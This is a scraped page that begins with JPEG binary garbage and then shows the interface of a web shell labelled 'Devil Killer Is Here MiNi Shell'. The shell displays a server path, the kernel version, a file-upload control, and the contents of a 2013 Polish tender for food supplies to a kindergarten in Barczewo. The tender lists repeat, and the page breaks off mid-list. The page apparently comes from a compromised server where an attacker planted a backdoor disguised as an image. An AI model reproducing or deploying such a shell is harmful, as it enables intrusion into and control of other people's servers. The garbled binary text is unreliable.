JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131203/497646-N-2013.html

<p class="kh_header"><b>Barczewo: ZAKUP DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE</b><br>
<b>Numer ogłoszenia: 497646 - 2013; data zamieszczenia: 03.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Miejskie w Barczewie , ul. Słowackiego 7, 11-010 Barczewo, woj. warmińsko-mazurskie, tel. 89 5148396, faks 89 5148396.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przedszkolebarczewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienia obejmują 6 części: MP 341.2.2013                                                                                                                    ZAŁĄCZNIK NR 1

Szczegółowy opis przedmiotu zamówienia dla poszczególnych części

CZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego               w Barczewie
Artykuły ogólnospożywcze  CPV : 15.60.00.00-4;15.80.00.00.-6;15.82.00.00.-2;15.83.00.00-5,15.84.00.00-8;15.85.00.00.-1;  15.86.00-4;15.87.00.00-7;15.89.00.00-3;15.98.00.00-1;15.40.00.00.-2;15.33.00.00-0;03.14.25.00-3
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Jaja kurze klasa M
Szt
6800
2.
Makaron różne kształty w oryginalnych opakowaniach od400do500g pszenica zwyczjna
Kg
280
3.
Makaron drobny gwiazdki,muszelkiop.250-500g
Kg
40
4.
Płatki owsiane op500g
Kg
40
5.
Płatki jęczmienne op500g
Kg
40
6.
Kasza manna 1000g
Kg
50
7.
Kasza kukurydziana op.250-500g
Kg
24
8.
Kasza jaglana op.400-500g
Kg
36
9.
Kasza  jęczmienna średnia op.400-500g
Kg
96
10.
Kasza gryczana prażona op.400-1000g
Kg
60
11.
Kasza pęczak op.400-500g
Kg
15
12.
Mąka pszenna typ 550op.1000g
Kg
500
13.
Mąka ziemniaczana op.500-1000g
Kg
10
14.
Płatki ryżowe op.250-500g
Kg
40
15.
Ryż biały długoziarnisty op.1000g
Kg
130
16.
Płatki kukurydziane zwykłe zawierające co najmniej 90% mąki kukurydzianej op.250-1000g
Kg
45
17.
Płatki kukurydziane miodowe zawierajace co najmniej 90% mąki kukurydzianej op.250-1000g
Kg
45
18.
Cukier biały kryształ,pakowany op.1000g
Kg
750
19.
Dżem niskosłodzony różne smaki op.co najmniej370g
Szt
380
20.
Koncentrat pomidorowy30% op.co najmniej 200g
Szt
440
21.
Sól kuchenna jodowana biała,drobna op.1000g
Kg
130
22.
Sól morska drobnaop.1000g
Kg
20
23.
Kawa zbożowa rozpuszczalna skład zbożą72% składJęczmień,żyto,cykoria,burak cukrowy-prażone.Op 150g
Szt
65
24.
Kakao prawdziwe op.100-200g
Kg
10
25.
Budyń w proszku różne smaki op.waga co najmniej 40g
Szt
600
26.
Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g
Szt
600
27.
Olej z pierwszego tłoczenia rzepakowy op.900-1000g
L
160
28.
Olej słonecznikowy op.900-1000g
L
30
29.
Makaron pełnoziarnisty op.500g
Kg
60
30.
Herbata owocowa,saszetki,pakowanaop.co najmniej 30 szt
Szt
200
31.
Herbata miętowa saszetki ,pakowana op.co najmniej20szt
Szt
60
32.
Herbata granulowanaop.100g
Szt
140
33.
Krakersy
Kg
30
34.
Biszkopty op.250-500g
Kg
90
35.
Ciastka kruche różne rodzaje op.od 1000-4000g
Kg
150
36.
Ciastka typu markizy
Kg
60
37.
Woda źródlana niegazowana pakowana op.1500-5000g
L
1000
38.
Keczup pomidorowy,łagodny w słoikuop.200g 60-65% koncentratu pom.
Szt
250
39.
Pieprz mielony prawdziwy bez dodatków w oryginalnych op.
Szt
100
40.
Pieprz ziołowy w oryginalnych opakowaniach
Szt
100
41.
Ziele angielskie w oryginalnych opakowaniach
Szt
40
42.
Liść laurowy w oryginalnych opakowaniach
Szt
40
43.
Majonez słoik op.850g Skład: co najmniej 83% oleju rzepakowego.
szt
16
44.
Ogórek konserwowy w oryginalnych opakowaniach 0,9l słoik
Szt
40
45.
Kukurydz konserwowa puszka op.400g
Szt
30
46.
Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g
szt
25
47.
Chrzan tarty słoik op.co najmniej170gz kwaskiem cytrynowym
Szt
30
48.
Koncentrat barszczu czerwonego w op. szklanych
szt
30
49.
Groszek konserwowy w puszce w oryginalnych op.400g
Szt
20
50.
Papryka mielona słodka w oryginalnych op.20g
Szt
50
51.
Przyprawa Curry op10-20g
Szt
30
52.
Przyprawa Kurkuma  op.10-20g
Szt
20
53.
Majeranek otarty waga co najmniej 8g
szt
60
54.
Wafle suche prostokątne
Szt
240
55.
Nutella w oryginalnych op.600g lub produkt równoważny.
Szt
40
56.
Zioła prowansalskie w oryginalnych opakowaniach op.10g
szt
40
57.
Cukier waniliowy
szt
60
58.
Kwasek cytrynowy
Szt
60
59.
Musztarda słoik op.co najmniej 180g
szt
60
60.
Miód naturalny wielokwiatowy op.370g
Szt
50
61.
Ananas plastry puszka waga bez odcieku co najmniej 565g
szt
30
62.
Czekolada mleczna 100g
Szt
150
63.
Cukierki czekoladowe typu michałki lub równoważne
Kg
30
64.
Proszek do pieczenia
Szt 
15
65.
Sok owocowo-warzywny op.co najmniej 700ml
L
550
66.
Syrop owocowy 62%ekstraktu owocowego butelka szklana op.co najmniej420ml
L
160
67.
Makrela w sosie pomidorowym bez warzyw op co najmnie 200g
Szt
100
68.
  Sałatka z makreli op co najmniej 150g
Szt
120
69.
Cukier puder op.co najmniej 500g
Kg
10
70.
Tymianek suszony waga co najmniej10g
Szt
30
71.
Oregano suszone waga co najmniej 10g
Szt
40
72
Napój owocowy ze słomką w kartonikach op co najmniej 150g
szt
880
73
Kawa zbożowa sypana op.co najmniej 200g
szt
50
74
Ryż brązowy 
kg
20

CZĘŚĆ 2. Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie                                        CPV: 15.10.00.00-9;15.11.21.00-7
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Karkówka surowa wieprzowa bez kości
Kg
170
2.
Łopatka wieprzowa surowa bez kości
Kg
375
3.
Wołowina surowa ligawa
Kg
35
4.
Szynka wieprzowa surowa bez kości,bez skóry
Kg
150
5.
Filet z indyka surowy
Kg
170
6.
Filet z kurczaka surowy
Kg
300
7.
Schab bez kości surowy wieprzowy
Kg
140
8.
Udka bez grzbietu z kurczaka surowe
Kg
250
9.
Antrykot wołowy surowy
Kg
30
10.
Żebra wołowe surowe
Kg
20
11.
Porcje rosołowe z kurczaka
Kg
50
12.
Wątróbka drobiowa surowa
Kg
30
13.
Parówki wp. cienkie o zwartości co najmniej60% mięsa wp.
Kg
70
14.
Ogonówka wp. parzona zawierajaca co najmniej 64% mięsa wp.
Kg
35
15.
Schab wędzony parzony zawierajacy co najmniej 73% mięsa wp.
kg
20
16.
Polędwica wp wędzona parzona zawierajaca co najmniej 63% miesa wp.
Kg
25
17.
Szynka wędzona parzona  mieso wp. 100%
kg
60
18.
Kiełbasa wp-baton zawierajaca 100% mięsa wp.sucha
Kg
25
19.
Szynka wędzona parzona -mięso wp.77%
Kg
50
20.
Kiełbasa szynkowa zawierająca co najmniej 70% mięsa wp
Kg
50
21.
Kiełbasa wp. cienka zawierajaca  co najmniej 63% mięsa wp.
kg
40
22.
Filet wędzony z indyka o zawartości mięsa co najmiej 90%
Kg
45
23.
Kiełbasa drobiowa -baton o zawartości mięsa co najmniej70%
Kg
55
24.
Łopatka pieczona zawartość mięsa co najmniej 90%
kg
45
25.
Pasztet pieczony drobiowy zawierający co najmniej30% mięsa z kury
kg
35
26.
Filet wędzony drobiowy zawierajacy co najmniej 60% mięsa z kury.
Kg
15
27
Parówki drobiowe zawierająca co najmniej 60% miesa drobiowego
kg
30
28
Schab wp. parzony 
kg
20
29
Pasztet pieczony wp zawierający co najmniej 30% mięsa wp.
kg
35
30
Smalec wp. kostka 200-250g
Kg
20
31
Boczek wędzony parzony
Kg
20



CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców, owoców tropikalnych,orzechów.
CPV:  03.20.00.00-3; 0,.22.00.00-9;03.22.21.10-7
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Ziemniaki stare
kg
6000
2.
Marchew świeża korzeń
kg
600
3.
Pietruszka świeża korzeń
kg
150
4.
Cebula biała
kg
100
5.
Cebula czerwona
kg
40
6.
Seler świezy korzeń
kg
150
7.
Por świeży
kg
220
8.
Kapusta czerwona świeża
kg
120
9.
Pieczarki świeże 
kg
50
10.
Czosnek kraj pochodzenie polska głowka 
szt
120
11.
Szczypior świeży pęczek
szt
600
12.
Rzodkiewka pęczek
szt
600
13.
Rzodkiew biała świeża
Kg
40
14
Sałata lodowa ,pakowana główka
szt
80
15
Sałata  zielona świeża główka
Szt
450
16
Pomidory czerwone, świeże
kg
400
17
Ogórek swieży,zielony szklarniowy
kg
180
18
Ogórek kwaszony
Kg
80
19
Kapusta kwaszona biała
kg
180
20
Kapusta pekinska 
kg
90
21
Kapusta biała słodka  główka
kg
220
22
Papryka czerwona ,żółta,zielona
kg
50
23
Cytryna świeża
Kg
40
24
Jabłka świeże
kg
1200
25
Banany świeże
kg
300
26
Gruszki świeże
kg
120
27
kiwi
Kg
70
28
Mandarynki  świeże
kg
300
29
Winogrona zielone bezpestkowe
kg
80
30
arbuzy
Kg
40
31
Śliwka fioletowa duża
kg
60
32
Brzoskwinie
kg
60
33
Truskawka świeża
kg
60
34
Winogrona granatowe
kg
40
35
Koper zielony,świeży pęczek 100g
Szt
600
36
Natka pietruszki świeza pęczek  100g
szt
600
37
Burak czerwony świeży
Kg
350
38
Rodzynki op.co najmniej 100g-150g
kg
3
39
Orzechy włoskie łuskane op.co najmniej100g
kg
2
40
Fasola sucha średnia  op.400-1000g
Kg
30
41
Groch połówki op. 400-1000g
kg
30
42
Pietruszka suszona natka op.50-100g
kg
2
43
Włoszczyzna suszona op.100-200g
kg
3
44
Koper zielony suszony op 50-100g
kg
1
45
Pestki słonecznika op.50-150g
kg
1
46
Żurawina suszona op.250-500g
kg
3
47
Cebulka suszona op.50-100g
kg
1
48
Kapusta młoda biała główka ( w sezonie)
kg
30
49
Ziemniaki młode (w sezonie)
kg
200
50
Botwinka pęczek(w sezonie)
pęczek
60
51
Ogórek świeży gruntowy w sezonie
kg
25
52
Włoszczyzna w pęczkach młoda w sezonie
pęczek
20





 
CZĘŚĆ 4. Zakup, dostawa i rozładunek  mrożonek dla Przedszkola Miejskiego w Barczewie ryby przetworzone,warzywa i owoce mrożone PCV 15.20.00.00-0;15.33.11.70-9,15.89.60.00-5;15.89.43.00-4                                    
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Włoszczyzna4-składnikowa(marchew,por,seler,pietruszka)op.2000-2500g)
kg
1000
2.
Mieszanka 7-składnikowa z kapusta 2000-2500g
kg
180
3.
Brokuły mrożone 450g-2500g
kg
150
4.
Kalafior mrożony op.450-2500g
kg
150
5
Fasolka szparagowa żółta cięta op.450-2500g
kg
100
6
Fasolka szparagowa zielona cieta op.450-2500g
kg
100
7
Szpinak mrożony mielony.op.450-2500g
Kg
90
8 
Groszek zielony mrożony op.450-2500g
kg
60
9
Barszcz ukraiński skład:burak (ćwikłowy,kapusta,fasola,marchew,pomidor,seler,cebula)op.450-2500g
kg
60
10
Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g 
Kg
300
11
Mieszanka kompotowa 5-składnikowa(ananas,porzeczka czerwona,porzeczka czarna,rabarbar,truskawka) lub równoważna
kg
250
12
Truskawka mrożona op.450-2500g
Kg
150
13
Bukiet warzyw (brokuł,kalafior,marchew)op.450-2500g
Kg
150
14
Warzywa na patelnie (skład:cukinia,fasola,kalafior romanescu,marchew,papryka,cebula,kukurydza)op.450-2500g
kg
150
15
Marchew kostka op.450-2500g
kg
190
16
Marchew z groszkiem op.450-2500g
Kg
150
17
Wiśnia bp op.450-2500g
Kg
60
18
Porzeczka czarna mrożona op.450-2500g
kg
60
19
Dorsz filet SHP
kg
90
20
Miruna filet SHP
kg
100
21
Morszczuk filet SHP
kg
60
22
Mintaj filet SHP
kg
80
23
Makrela wędzona
Kg
48
24
Włoszczyzna 3-składnikowa paski op.450-2500g
Kg
100
25
Pyzy z mięsem op.500-1000g mrożone
kg
60
26
Pierogi z truskawkami op.500-1000g mrożone
kg
100
27 
Ryba sola filet mrożona
kg
30
28
Pierogi z jagodami mrożone op500-1000g
kg
50
29
Mieszanka kompotowa z owoców leśnych op2000-2500g
kg
250





CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie PCV 15.50.00.00-3

Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Mleko folia 2%op.1000ml
L
6350
2.
Serek topiony o smaku śmietankowym kostka 100g
szt
350
3.
Mleko UHT op.1000ml 2%
L
150
4.
Mleko UHT op.1000ml 3,2%
L
150
5.
Masło ekstra zawierajace co najmniej 82% tłuszczu
kg
270
6.
Jogurt wielosmakowy,waga op.co najmniej150g
szt
2600
7.
Serek homogenizowany wanilia op.co najmniej 135g
szt
2000
8.
 Deser waniliowy pakowany op. co najmniej120g
szt
250
9.
Jogurt z kawałkami owoców,waga op.co najmnie150g
szt
2500
10.
Jogurt owocowy  do picia różne smaki typu Actimel lub równoważny op.co najmniej 100ml
szt
1000
11
Ser żółty  typu salami  (nie dopuszcza się produktu seropodobnego)
kg
35
12
Ser żółty typu gouda (nie dopuszcza się produktu seropodobnego)
kg
45
13
Śmietana 12% op.200-400g
L
350
14
Śmietana 18% op.200-400g
L
250
15
Twaróg krajanka półtłusty
kg
460
16
Jogurt naturalny op. co najmniej 400ml
L
150
17
Serek topiony kostka 100g z szynką
Szt 
90
18
Jogurt owocowy do picia typu Milko lub równoważny op.co najmniej 0,5l
L
240

CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie PCV :15.81.00.00-9
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Chleb pszenno-żytni krojony foliowany waga co najmniej500g
Szt.
1800
2
Chleb razowy krojony foliowany waga co najmniej  400g
szt
1200
3
Bułki kajzerki waga co najmniej 50g
szt
2000
4
Bułka grahamka waga co najmniej 50-90g
szt
1800
5
Chleb wieloziarnisty zawartość minimum 3-ziarna(siemię lniane,słonecznik obowiązkowo,pozostałe dowolne) waga co najmniej 400-500g
szt
300
6
Ciasto drożdżowe
kg
140
7
Chałka zdobna co najmniej 250g
szt
400
8
Babka piaskowa
Kg
120
9
Rogaliki krucho -drozdżowe nadziewane
kg
160
10
Rogale maślane waga co najmniej 50g
szt
1000
11
Bułki czerstwe  waga co najmniej waga 50g
szt
500
12
Bułka tarta
kg
80
13
Bułka maślana waga co najmniej50g
szt
800
14
Piernik przekładany
Kg
40
15
Pączki lukrowane
szt
250
16
Rolada biszkoptowa z galaretką
kg
30
17
Bułka bagietka 
szt
80.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkolebarczewo.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miejskie w Barczewie ul.Słowackiego7 11-010 Barczewo pokój nr104 w godz.8:00-13:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2013 godzina 09:00, miejsce: Przedszkole Miejskie w Barczewie ul.Słowackiego7 11-010 Barczewo pokój nr104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego               w Barczewie
Artykuły ogólnospożywcze  CPV : 15.60.00.00-4;15.80.00.00.-6;15.82.00.00.-2;15.83.00.00-5;15.84.00.00-8;15.85.00.00.-1;  15.86.00-4;15.87.00.00-7;15.89.00.00-3;15.98.00.00-1;15.40.00.00.-2;15.33.00.00-0;03.14.25.00-3;
Lp. 
Nazwa asortymentu  
Jednostka miary
Ilość
1.
Jaja kurze klasa M
Szt
6800
2.
Makaron różne kształty w oryginalnych opakowaniach od400do500g pszenica zwyczjna
Kg
280
3.
Makaron drobny gwiazdki,muszelkiop.250-500g
Kg
40
4.
Płatki owsiane op500g
Kg
40
5.
Płatki jęczmienne op500g
Kg
40
6.
Kasza manna 1000g
Kg
50
7.
Kasza kukurydziana op.250-500g
Kg
24
8.
Kasza jaglana op.400-500g
Kg
36
9.
Kasza  jęczmienna średnia op.400-500g
Kg
96
10.
Kasza gryczana prażona op.400-1000g
Kg
60
11.
Kasza pęczak op.400-500g
Kg
15
12.
Mąka pszenna typ 550op.1000g
Kg
500
13.
Mąka ziemniaczana op.500-1000g
Kg
10
14.
Płatki ryżowe op.250-500g
Kg
40
15.
Ryż biały długoziarnisty op.1000g
Kg
130
16.
Płatki kukurydziane zwykłe zawierające co najmniej 90% mąki kukurydzianej op.250-1000g
Kg
45
17.
Płatki kukurydziane miodowe zawierajace co najmniej 90% mąki kukurydzianej op.250-1000g
Kg
45
18.
Cukier biały kryształ,pakowany op.1000g
Kg
750
19.
Dżem niskosłodzony różne smaki op.co najmniej370g
Szt
380
20.
Koncentrat pomidorowy30% op.co najmniej 200g
Szt
440
21.
Sól kuchenna jodowana biała,drobna op.1000g
Kg
130
22.
Sól morska drobnaop.1000g
Kg
20
23.
Kawa zbożowa rozpuszczalna składzbożą72%(Jęczmień,żyto),cykoria,burak cukrowy-prażone.Op 150g
Szt
65
24.
Kakao prawdziwe op.100-200g
Kg
10
25.
Budyń w proszku różne smaki op.waga co najmniej 40g
Szt
600
26.
Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g
Szt
600
27.
Olej z pierwszego tłoczenia rzepakowy op.900-1000g
L
160
28.
Olej słonecznikowy op.900-1000g
L
30
29.
Makaron pełnoziarnisty op.500g
Kg
60
30.
Herbata owocowa,saszetki,pakowanaop.co najmniej 30 szt
Szt
200
31.
Herbata miętowa saszetki ,pakowana op.co najmniej20szt
Szt
60
32.
Herbata granulowanaop.100g
Szt
140
33.
Krakersy
Kg
30
34.
Biszkopty op.250-500g
Kg
90
35.
Ciastka kruche różne rodzaje op.od 1000-4000g
Kg
150
36.
Ciastka typu markizy
Kg
60
37.
Woda źródlana niegazowana pakowana op.1500-5000g
L
1000
38.
Keczup pomidorowy,łagodny w słoikuop.200g 60-65% koncentratu pom.
Szt
250
39.
Pieprz mielony prawdziwy bez dodatków w oryginalnych op.
Szt
100
40.
Pieprz ziołowy w oryginalnych opakowaniach
Szt
100
41.
Ziele angielskie w oryginalnych opakowaniach
Szt
40
42.
Liść laurowy w oryginalnych opakowaniach
Szt
40
43.
Majonez słoik op.850g Skład: co najmniej 83% oleju rzepakowego.
szt
16
44.
Ogórek konserwowy w oryginalnych opakowaniach 0,9l słoik
Szt
40
45.
Kukurydz konserwowa puszka op.400g
Szt
30
46.
Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g
szt
25
47.
Chrzan tarty słoik op.co najmniej170gz kwaskiem cytrynowym
Szt
30
48.
Koncentrat barszczu czerwonego w op. szklanych
szt
30
49.
Groszek konserwowy w puszce w oryginalnych op.400g
Szt
20
50.
Papryka mielona słodka w oryginalnych op.20g
Szt
50
51.
Przyprawa Curry op10-20g
Szt
30
52.
Przyprawa Kurkuma  op.10-20g
Szt
20
53.
Majeranek otarty waga co najmniej 8g
szt
60
54.
Wafle suche prostokątne
Szt
240
55.
Nutella w oryginalnych op.600g lub produkt równoważny.
Szt
40
56.
Zioła prowansalskie w oryginalnych opakowaniach op.10g
szt
40
57.
Cukier waniliowy
szt
60
58.
Kwasek cytrynowy
Szt
60
59.
Musztarda słoik op.co najmniej 180g
szt
60
60.
Miód naturalny wielokwiatowy op.370g
Szt
50
61.
Ananas plastry puszka waga bez odcieku co najmniej 565g
szt
30
62.
Czekolada mleczna 100g
Szt
150
63.
Cukierki czekoladowe typu michałki lub równoważne
Kg
30
64.
Proszek do pieczenia
Szt 
15
65.
Sok owocowo-warzywny op.co najmniej 700ml
L
550
66.
Syrop owocowy 62%ekstraktu owocowego butelka szklana op.co najmniej420ml
L
160
67.
